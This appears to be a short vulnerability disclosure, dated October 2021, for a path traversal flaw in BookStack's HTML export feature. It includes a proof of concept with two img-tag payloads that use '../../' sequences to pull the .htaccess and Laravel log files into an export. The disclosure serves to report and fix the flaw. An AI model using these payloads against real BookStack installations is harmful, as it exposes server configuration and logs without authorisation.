Path Traversal in bookstackapp/bookstack
Oct 7th 2021
A path traversal vulnerability in BookStacks export function allows for the exposure of sensitive files in local or local_secure Laravel filesystems.
Proof of Concept
1: Write the following in a new page:
<p id="bkmrk-"><img src="BOOKSTACK_URL]/uploads/images/../../.htaccess" alt="cat.jpg" /></p>[
2: Export in contained HTML to find the .htaccess file base64 encoded
3: If the STORAGE_IMAGE_TYPE in .env is set to local_secure, then it is possible to obtain the Laravel log file via the following payload:
<p id="bkmrk-"><img src="http://10.0.2.15/uploads/images/../../logs/laravel.log" alt="cat.jpg" /></p>
This vulnerability is capable of exposure of sensitive log/configuration files present in the Laravel filesystems.